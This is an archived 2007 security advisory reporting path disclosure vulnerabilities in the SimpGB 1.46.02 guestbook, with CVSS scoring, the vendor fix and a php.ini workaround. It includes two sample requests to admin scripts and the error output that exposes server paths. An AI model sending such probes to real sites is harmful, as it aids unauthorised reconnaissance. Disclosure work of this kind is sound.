netVigilance Vulnerability intelligence since 2004

Archived document Original netVigilance advisory, published September 25 2007. Preserved as published — the advisory text and version numbers are unchanged; it is shown here converted from the original HTML page.

advisory0064 · published 2007-09-25

SimpGB version 1.46.02 Multiple Path Disclosure Vulnerabilities

archived

Current status

This advisory describes a vulnerability from 2007. It is not in the CISA Known Exploited Vulnerabilities catalog and there is no active remediation deadline. The page is kept online because other security databases link to it.

CVE reference not assigned
In KEV catalog no
Affected software SimpGB version 1.46.02
Captured from netvigilance.com

Original document

Reproduced as it was published, including the advisory numbering, scoring and the disclosure timeline used at the time.

converted from html as published 2007-09-25
Description:

SimpGB is a guestbook with data stored in MySQL, administration interface and support for multiple languages. Features: Data stored in MySQL, Administration interface, Support for multiple languages, Support for multiple instances in one database, Support for multiple layouts, Own header/footer can be defined, Support of BBCode and smilies, Admin can decide which BBCode tags to enable, Avatars (with option to let users upload their own), Admin can decide which input fields to display and which of them are required, Admins can write comments on posts, Admins can mark entry as "always on top", Admins can attach file to entry, flood protection, IP banlist, bad word list, send email notification upon new posts, optionally validate new posts before they get visible by public, own leadtext for entry form and own "Thank you" message can be defined, Option to mark posts as private (only admins can see them), search entries, Option to let users send emails out of guestbook.

External References:
Mitre CVE: ID requested but no answer received
NVD NIST: ID requested but no answer received
OSVDB: ID requested but no answer received

Summary:
SimpGB is a guestbook with data stored in MySQL, administration interface and support for multiple languages.
Security problems in the product allow attackers to gather the true path of the server-side script.

Release Date:
September 25 2007

Severity:

CVSS Version 2 Metrics:
Base Metrics:
Exploitability Metrics:
Access Vector: Network
Access Complexity: Low
Authentication: None
Impact Metrics:
Confidentiality Impact: Partial
Integrity Impact: None
Availability Impact: None

Temporal Metrics:
Exploitability: Functional
Remediation Level: Official Fix
Report Confidence: Confirmed

CVSS Version 2 Vectors:
Base Vector: "AV:N/AC:L/Au:N/C:P/I:N/A:N"
Temporal Vector: "E:F/RL:OF/RC:C"

CVSS Version 2 Scores:
Base Score: 5
Exploitability Subscore: 10
Impact Subscore: 2.9
Temporal Score: 4.1

SecureScout Testcase ID:
TC 17983

Vulnerable Systems:
SimpGB version 1.46.02

Vulnerability Type:
Program flaws - The product scripts have flaws which lead to Warnings or even Fatal Errors.

Vendor:
Bosch IT-Consulting

Vendor Status:
The Vendor has confirmed the problem and has release new version 1.47 that addresses the problem. New version of product was tested and we can confirm that all vulnerabilities were solved. For more information see vendor announcement. To download the latest version go to vendors product download area.

Workaround:
Disable warning messages: modify in the php.ini file following line: display_errors = Off.
Or modify .htaccess file (this will work only for the apache servers).

Example:

Path Disclosure Vulnerability 1:

REQUEST:
http://[TARGET]/[PRODUCT DIRECTORY]/admin/index.php?lang=aa

REPLY:
Warning: main(./language/lang_aa.php): failed to open stream: No such file or directory in [DISCLOSED PATH][PRODUCT DIRECTORY]dmin\index.php on line 14
Warning: main(): Failed opening './language/lang_aa.php' for inclusion (include_path='.;c:\php4\pear') in [DISCLOSED PATH][PRODUCT DIRECTORY]dmin\index.php on line 14
Warning: Cannot modify header information - headers already sent by (output started at [DISCLOSED PATH][PRODUCT DIRECTORY]dmin\index.php:14) in [DISCLOSED PATH][PRODUCT DIRECTORY]dmin\heading.php on line 112
Warning: Cannot modify header information - headers already sent by (output started at [DISCLOSED PATH][PRODUCT DIRECTORY]dmin\index.php:14) in [DISCLOSED PATH][PRODUCT DIRECTORY]dmin\heading.php on line 113
Warning: Cannot modify header information - headers already sent by (output started at [DISCLOSED PATH][PRODUCT DIRECTORY]dmin\index.php:14) in [DISCLOSED PATH][PRODUCT DIRECTORY]dmin\heading.php on line 114
Warning: Cannot modify header information - headers already sent by (output started at [DISCLOSED PATH][PRODUCT DIRECTORY]dmin\index.php:14) in [DISCLOSED PATH][PRODUCT DIRECTORY]dmin\heading.php on line 115

Path Disclosure Vulnerability 2:

REQUEST:
http://[TARGET]/[PRODUCT DIRECTORY]/admin/trailer.php

REPLY:
Fatal error: Call to undefined function: do_url_session() in [DISCLOSED PATH][PRODUCT DIRECTORY]dmin railer.php on line 7

Credits:
Jesper Jurcenoks
Co-founder netVigilance, Inc
www.netvigilance.com
Original URL: /advisory0064.html · preserved at the same address

Why this page still exists

Advisories published between 2004 and 2015 are referenced by vulnerability databases, academic papers and mailing list archives. Removing them would break those references, so every advisory keeps its original address and its original text. Nothing on this page has been rewritten to match current practice.